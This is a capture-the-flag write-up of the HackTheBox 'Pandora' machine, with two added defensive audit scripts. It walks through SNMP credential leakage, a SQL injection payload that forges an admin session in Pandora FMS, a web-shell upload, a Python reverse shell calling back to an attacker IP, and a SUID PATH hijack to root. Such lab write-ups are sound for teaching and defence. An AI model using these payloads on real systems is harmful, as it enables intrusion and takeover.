# HackTheBox-Pandora
## NMAP
```bash
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 115E49F9A03BB97DEB840A3FE185434C
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## PORT 80 (HTTP)
Visiting the web page, it seems to be a template.
It doesn't display anything interesting, so I ran `gobuster` to fuzz for files and directories.
It doesn't find anything either, so I tried subdomain enumeration with `wfuzz`, but that failed as well.
The web application didn't have anything interesting, so I started scanning UDP ports and found the `snmp` service running.
## Foothold
To enumerate the SNMP service there's a tool called `snmpwalk`, with which we can enumerate the running processes, interfaces and operating system.
Keeping this tool running, after 30 minutes I saw a process with credentials being passed to it.
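The credentials were visible because the process was started with them as arguments, and SNMP's hrSWRunParameters table (what `snmpwalk` read here) hands every process's argument list to anyone with the community string, just as `ps -ef` does locally. An added audit script, not from the box or from Pandora FMS, that flags processes passing secret-looking arguments; the argument shapes it matches are my own heuristic list:

```python
import os
import re

# Argument shapes that usually carry a secret: --password=x, --password x,
# -pSECRET, -p SECRET, PGPASSWORD=x, pass=x. An assumed heuristic list, so
# expect some noise from flags such as -print.
SECRET_ARG = re.compile(
    r"^(?:--?(?:password|passwd|pass|pwd|token|secret|api[_-]?key)(?:=(?P<v1>.+))?"
    r"|-p(?P<v2>\S*)"
    r"|[\w.]*(?:password|passwd|pass|token|secret)=(?P<v3>.+))$",
    re.IGNORECASE,
)

def find_cmdline_secrets(argv: list) -> list:
    """Return the argument values in one process argv that look like secrets."""
    hits = []
    for i, arg in enumerate(argv[1:], start=1):
        m = SECRET_ARG.match(arg)
        if not m:
            continue
        value = m.group("v1") or m.group("v2") or m.group("v3")
        if not value:  # "--password SECRET" or "-p SECRET": value is the next arg
            value = argv[i + 1] if i + 1 < len(argv) else ""
        if value:
            hits.append(value)
    return hits

def scan_proc() -> list:
    """Walk /proc and return (pid, program, secrets) for every offending process.
    /proc/<pid>/cmdline is the same view that SNMP's hrSWRunParameters and
    `ps -ef` give any observer, so whatever is listed here is already exposed.
    """
    findings = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
        except OSError:
            continue  # the process exited, or its cmdline is not readable by us
        secrets = find_cmdline_secrets(argv) if argv else []
        if secrets:
            findings.append((int(pid), argv[0], secrets))
    return findings

if __name__ == "__main__":
    # Report counts only, so running the audit does not copy the secrets into a new log.
    for pid, prog, secrets in scan_proc():
        print(f"pid {pid} ({prog}): {len(secrets)} secret-looking argument(s)")
```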
Checking the apache2 vhosts file we can see that there's a subdomain `pandora.panda.htb` running as user `matt`, but only on localhost, so we need to do port forwarding in order to access it through our browser.
```bash
ssh -L 2222:127.0.0.1:80 daniel@panda.htb
```
Also add the domain names to the /etc/hosts file.
Navigating to that port through the browser presents us with a login page for `Pandora`.
Going back to pandora's directory we can read some files, among which there's one named `pandoradb_data.sql` that has some queries; we see a query for the `admin` user containing his password hash.
So, trying to log in as daniel on pandora, we get an error that we are only allowed to use the API.
Looking at the API documentation, we can use operations to get some data from pandora.
https://pandorafms.com/manual/en/documentation/08_technical_reference/02_annex_externalapi
```bash
http://127.0.0.1:2222/pandora_console/include/api.php?op=get&op2=list_all_user&return_type=json&other=1&other_mode=url_encodeseparator|&apipass=1234&user=daniel&pass=HotelBabylon23
```
We can see that daniel is only allowed to read data through operations; we can also get the password hashes of users, but those were not crackable.
```bash
http://127.0.0.1:2222/pandora_console/include/api.php?op=get&op2=users&return_type=json&other=1&other_mode=url_encodeseparator|&apipass=1234&user=daniel&pass=HotelBabylon23
```
Looking for exploits I found a remote code execution, but that requires us to be authenticated as an admin user.
The second exploit was related to SQLi in `/include/chart_generator.php?session_id='`.
We can verify that there's a SQLi by breaking the query with `'`.
Now, to check how many columns there are, we can use `ORDER BY`.
It doesn't give any MySQL errors, so we are good; let's increase the number.
It gives an error when we try to sort the table by the fourth column, which doesn't exist, so there are 3 columns in the table from which it's fetching the data.
## Rabbit Hole
So let's use `sqlmap` to dump data; we can either directly supply the URL or save the request through Burp. I find saving the request convenient, so I'll go with that.
And it's going to start dumping the database.
Now here is where we fell into a rabbit hole: by dumping the database we can find session IDs for users on Pandora FMS, but those are only for matt and daniel; daniel only has access to the API and matt is just a normal user.
Replace the session ID in the `PHPSESSID` cookie.
But we can't really do much as the matt user.
## Privilege Escalation (Matt)
So, going back to the URL which was vulnerable to SQLi, we can elevate our privileges to become the admin user by following this article.
https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
To check what values the table's columns expect, we can look in the `pandoradb.sql` file and see that `tsession_php` has three columns.
Our SQLi payload would look like this:
```sql
union+select+'randomshit_token','1638796349','id_usuario|s:5:"admin";'+--+
```
It's using a select statement to create a PHP session for the admin user with the token we provided; the token could be anything.
Running this doesn't show any errors, which means it executed correctly; now replace the `PHPSESSID` with our token.
We are now logged in as the admin user; all that is left is to use the RCE exploit. I tried the exploit from exploit-db but it didn't work.
Then I saw a PHP file upload exploit in a YouTube video.
So we make a PHP file which will allow us to execute commands and make a zip archive of that PHP, as we need to upload it as an extension.
```php
```
Then upload the archive containing the PHP file.
After uploading the file, execute it through `http://127.0.0.1:2222/pandora_console/extensions/shell.php`.
We can get a reverse shell through `python3`:
```python
python3%20-c%20%27import%20socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.17%22,3333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(%22/bin/sh%22)%27
```
Stabilizing the shell with python3.
## Privilege Escalation (root)
Let's see if we have privileges to run something as the root user with `sudo -l`, but it gives an error.
This can be fixed by generating a pair of SSH keys and logging in over SSH.
But it seems we can't run anything as root, so moving on to finding SUID binaries.
This binary seems suspicious as it isn't available by default; transferring the `pandora_backup` binary we can see that it's using `tar` to create an archive from `/var/www/pandora/pandora_console/*` in `/root/.backup` with the archive name `pandora-backup.tar.gz`.
So this is vulnerable to a PATH variable hijack: we can create a file named `tar` which will make `bash` a SUID binary, and make it executable.
Then export the PATH variable:
```bash
export PATH=/tmp:$PATH
```
As we run the binary it will make bash SUID.
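The hijack works because `pandora_backup` names `tar` without a path, so the caller's PATH decides which `tar` runs while the effective uid is root. An added audit script, not from the box, that lists SUID binaries and reports string literals inside them that invoke a utility by bare name rather than by absolute path; the list of utilities and the two sample binaries are constructed:

```python
import os
import re
import stat

# Utilities privileged helpers commonly shell out to (an assumed list). A literal like
# "tar -czvf ..." with no leading slash is resolved via the caller's PATH at run time.
SHELL_TOOLS = rb"tar|cp|mv|rm|gzip|zip|cat|find|chmod|chown|sh|bash|mysqldump|rsync"
BARE_CMD = re.compile(rb"(?<![\w/.-])(?:" + SHELL_TOOLS + rb")\s+[-/\w*.]")
PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")  # the runs `strings` would print

def bare_commands(blob: bytes) -> list:
    """Return printable strings in blob that invoke a tool by bare name."""
    hits = []
    for run in PRINTABLE.findall(blob):
        for m in BARE_CMD.finditer(run):
            # Only a command position counts: literal start or after a shell separator.
            before = run[: m.start()].rstrip()
            if not before or before.endswith((b"|", b";", b"&", b"(", b"`")):
                hits.append(run.decode())
                break
    return hits

def find_suid(root: str = "/") -> list:
    """Return regular files under root that carry the set-uid bit."""
    out, skip = [], {"/proc", "/sys", "/dev"}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                out.append(path)
    return out

def audit(root: str = "/") -> dict:
    """Map each readable SUID binary under root to the bare commands inside it."""
    report = {}
    for path in filter(lambda p: os.access(p, os.R_OK), find_suid(root)):
        with open(path, "rb") as f:
            cmds = bare_commands(f.read())
        if cmds:
            report[path] = cmds
    return report

# Constructed stand-ins for the backup helper: as shipped, and with an absolute path.
VULN = b"\x7fELF\0tar -czvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*\0Backup successful!\0"
FIXED = b"\x7fELF\0/usr/bin/tar -czvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*\0"
```

Anything `audit()` reports should either call its helper by absolute path (as in `FIXED`) or reset PATH and drop privileges before shelling out.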
## References
- https://book.hacktricks.xyz/pentesting/pentesting-snmp
- https://vuldb.com/?id.174621
- https://pandorafms.com/manual/en/documentation/08_technical_reference/02_annex_externalapi
- https://www.exploit-db.com/exploits/48280
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32099
- https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained
- https://www.youtube.com/watch?v=rJXusinFPw4
- https://k4m1ll0.com/cve-2020-8500.html